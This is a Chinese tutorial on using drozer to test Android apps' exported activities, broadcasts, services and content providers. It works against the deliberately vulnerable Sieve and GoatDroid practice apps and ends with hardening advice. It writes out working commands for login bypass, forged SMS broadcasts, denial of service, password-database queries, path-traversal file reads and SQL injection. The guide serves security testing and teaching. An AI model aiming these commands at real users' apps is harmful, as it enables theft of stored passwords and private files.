《移动安全》（6）使用drozer检测四大组件（下）_检查安装程序中的是否调用四大组件

在drozer console中直接使用help查看；然后进一步使用help command可查看各命令更具体的使用方法。

通过输入安装包的部分关键字查找包全称 run app.package.list -f 安装包部分关键字

run app.package.list -f demo

使用app.package.info模块查看apk基本信息

run app.package.info -a com.example.demo

1.检测四大组件

四大组件

Activity（界面）：通常展现为一个可视化的用户界面，是负责与用户交互的组件。常见的漏洞包括Activity劫持漏洞、越权漏洞等。

Service（服务）：无用户界面，是运行于后台的服务，但是及其重要，经常在后台执行一些敏感的操作。常见的漏洞包括权限提升，拒绝服务攻击等。

Broadcase receiver（广播接收器）：无用户界面，能够启动一个 activity 或 serice来响应它们收到的信息，或者用 NotificationManager 来通知用户。当应用广播接收器默认设置exported='true'，导致应用可能接收到第三方恶意应用伪造的广播，利用这一漏洞，攻击者可以在用户手机通知栏上推送任意消息，通过配合其它漏洞盗取本地隐私文件和执行任意代码。

Content provider（内容提供者）：为存储和获取数据提供统一的接口，可以在不同的应用程序之间共享数据。常见的漏洞包括读写权限漏洞、SQL注入漏洞、文件遍历漏洞等。

使用app.package.attacksurface模块识别攻击面

run app.package.attacksurface com.example.demo

所谓攻击面，应该就是指可export的安卓四大组件（activaty、broadcast receiver、content provider、service）,如果查看到四大组件中有可export的，就去具体看可export的组件有没有问题。

（1）activity组件测试

查看activity组件信息

run app.activity.info -a com.example.demo

调用暴露的activity组件

run app.activity.start --component package_name Activity_name

一般activity组件只会暴露一个程序启动界面，在暴露其他的就属于组件暴露，有安全隐患。

run app.activity.start --component com.example.demo com.example.demo.MortgageActivity

Activity劫持

如果apk未对界面劫持进行反劫持检测，那么用户就会受到劫持欺骗攻击。如果一个恶意应用在用户启动银行app时，启动自身界面，模拟成银行的登录界面，那么在用户没有察觉的情况下，可以直接偷走用户输入的账号密码。

下面使用一个测试apk对目标应用进行界面覆盖，观察目标应用是否告警提示。

Activity越权

测试APP下载地址

https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk

这是一个管理密码的APP，运行时需要输入密码（com.mwr.example.sieve.MainLoginActivity），验证成功才能查看管理的密码内容（com.mwr.example.sieve.PWList）。

先查看对外暴露的 activity 组件信息

直接调用查看密码的Activity，成功绕过登录验证功能。

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

（2）broadcast组件测试

查看Broadcast组件信息

run app.broadcast.info  -a org.owasp.goatdroid.fourgoats

测试APP下载地址：

https://github.com/nvisium-jack-mannino/OWASP-GoatDroid-Project/downloads

反编译，查看源码，发现需要两个参数 phoneNumber、message

发送恶意广播

run app.broadcast.send --action 广播名 --extra string name lisi

反编译apk，查看AndroidManifest.xml 文件，获取广播名

run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --extra string phoneNumber 1234 --extra string message dog

拒绝服务攻击

向广播组件发送不完整intent，使用空 extras，可以看到应用停止运行。

run app.broadcast.send --action <action>

run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS

（3）content provider组件测试

查看content provider组件信息

run app.provider.info -a com.mwr.example.sieve

可以看出， 对DBContentProvider 内容提供器的访问，除了/Keys 路径需要权限，其他都不需要权限；而对 FileBackupProvider 内容提供器的访问则不需要任何权限，那么我们就可以从中获取敏感数据。

（4）service组件测试

查看service组件信息

run app.service.info -a com.mwr.example.sieve

调用服务组件

run app.service.start --action 服务名 --component 包名 服务名

run app.service.start --action org.owasp.goatdroid.fourgoats.services.LocationService --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService

2.检测URI数据泄露风险

获取内容提供器的 URIS 资源访问路径

run scanner.provider.finduris -a <包名>

run scanner.provider.finduris -a com.mwr.example.sieve

敏感数据读取

run app.provider.query uri

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords

3.检测文件遍历漏洞

检测文件遍历漏洞

run scanner.provider.traversal -a <包名>

读取系统文件

 run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

下载系统文件

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db f:/home/database.db

4.检测是否存在本地sql注入

扫描注入位置

run scanner.provider.injection -a <包名>

手工注入

执行以下命令，发现返回了报错信息，接着构造sql获取敏感数据

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection " * from Key;--+"

5.建议

当组件为私有组件时，建议设置android:exported的值为 false；当组件为公有组件时，建议对其进行权限控制。